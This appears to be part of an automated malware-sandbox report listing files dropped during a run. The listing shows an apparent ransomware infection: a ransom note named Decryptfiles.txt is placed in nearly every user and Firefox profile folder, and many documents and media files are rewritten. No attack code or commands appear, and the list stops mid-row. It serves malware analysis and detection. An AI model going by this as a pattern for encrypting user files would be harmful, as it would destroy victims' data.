C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\054622d9-6ed7-4f25-87fd-b3a9cd668b65 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\12672553-cb8c-4210-ae02-a59c1a541208 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\2b167346-5f76-4c00-8f97-19cee0df0fba | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\372e391e-787d-40e8-8beb-44106d6c22f4 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\3b7fc3d4-90d3-48a3-834f-e61d315e9a5c | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\58b46d46-b146-420f-81af-5b32c19a8aef | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\59bd13a9-8183-4ac7-8723-9621ae6d3748 | OpenPGP Public Key | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\5e0297e1-aa9b-4634-aaf1-cfd1f718b993 | OpenPGP Public Key | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6c257ec7-9ee7-4e42-91a6-7d3b50c23b76 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6db12043-3902-4d45-8c5d-d992fbf6d4e7 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\758d1c71-5fff-4193-9977-7a57afa68bf7 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7917ce80-55b3-46ca-99c2-70537bbb959a | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7a27ea16-e265-40c0-823c-0125abf7d855 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7b2ddd96-6d27-491a-a7e0-811ed320f1f0 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7f0194d6-62d6-4174-a7ed-55ebc13aacb4 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\b3c274f7-6fd8-4832-989b-74a48f86b6b5 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\c64980e6-c743-4793-ba4a-89f593d4eb16 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\e6e57dc0-d354-4d4a-8374-548b8e2bcc5d | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\f5c2d345-4cad-4c1a-a51d-15d682036066 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\session-state.json | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\state.json | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extensions.json | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shm | COM executable for DOS | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shm.HtvE (copy) | COM executable for DOS | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-wal.kIhf | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\handlers.json | COM executable for DOS
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\handlers.json.IXZn (copy)
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\parent.lock.FXRH
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqlite
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal.YNXd
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\18a05d94-e006-440f-b702-3e398a280dbf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2c8e5eea-375d-48a9-ad4c-be583ff1215d
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\3be89113-af2b-4b48-9c47-40ac1156f7a2
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6260e81e-5ef5-4137-a0a5-7930ea6f0a75
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6786f292-c1be-4996-99cd-77aa855c1844
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\edd11145-a3b3-4ebf-ba7b-14b7ec08f19f
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\ff032c8b-05e6-43c9-9e84-732dbe7aca27
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\ls-archive.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\.metadata-v2
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.YnEI
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.ljOI
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.tiBv
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
|
big endian ispell hash file (?),
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.gJOW
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.hQNu
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.MclI
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\targeting.snapshot.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\times.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-wal.nxmV
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\xulstore.json.EBes
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\times.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\_curlrc.SbgX
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\6d9d9777-7ded-4768-8191-9a707d72b009\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Contacts\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\AQRFEVRTGL.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\ATJBEMHSSB\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\BQJUWOYRTO.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\BQJUWOYRTO\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\BWETZDQDIB.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\BWETZDQDIB\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\GNLQNHOLWB.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BQJUWOYRTO.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BWETZDQDIB.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\HMPPSXQPQV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\HQJBRDYKDE.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\HMPPSXQPQV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\LHEPQPGEWF.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\QFAPOWPAFG.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\GNLQNHOLWB.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\PWZOQIFCAN.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\VWDFPKGDUF.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\NIRMEKAMZH\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS_1.vbs
|
data
|
dropped
|
||
C:\Users\user\Desktop\QFAPOWPAFG.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\QFAPOWPAFG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\UBVUNTSCZJ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\AQRFEVRTGL.png
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\AQRFEVRTGL.png.unVz (copy)
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\HMPPSXQPQV.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\LFOPODGVOH.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\UNKRLCVOHV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\WDBWCPEFJW\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\WSHEJMDVQC\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\AQRFEVRTGL.png
|
data
|
dropped
|
||
C:\Users\user\Documents\ATJBEMHSSB\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\BQJUWOYRTO.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\BQJUWOYRTO\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\Documents\BWETZDQDIB\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\GNLQNHOLWB.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BWETZDQDIB.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\HMPPSXQPQV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\LHEPQPGEWF.pdf
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\HQJBRDYKDE.png
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\HQJBRDYKDE.png
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\LFOPODGVOH.docx
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\GNLQNHOLWB.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\LIJDSFKJZG.docx
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\PWZOQIFCAN.png
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\NIRMEKAMZH\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\PWZOQIFCAN.png
|
data
|
dropped
|
||
C:\Users\user\Documents\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\QFAPOWPAFG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\UBVUNTSCZJ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\HMPPSXQPQV.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\UNKRLCVOHV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\VWDFPKGDUF.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\WDBWCPEFJW\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\WSHEJMDVQC\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Downloads\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\BWETZDQDIB.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Downloads\GNLQNHOLWB.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\HQJBRDYKDE.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\LFOPODGVOH.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\LFOPODGVOH.xlsx
|
data
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.jpg
|
Dyalog APL aplcore version -21.-102
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\LIJDSFKJZG.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWZOQIFCAN.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\QFAPOWPAFG.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\Downloads\UNKRLCVOHV.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf
|
data
|
dropped
|
||
C:\Users\user\Favorites\Amazon.url
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\Bing.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Favorites\Facebook.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Links\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Favorites\Live.url
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\NYTimes.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Twitter.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Wikipedia.url
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\Youtube.url
|
data
|
dropped
|
||
C:\Users\user\Links\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Music\Decryptfiles.txt
|
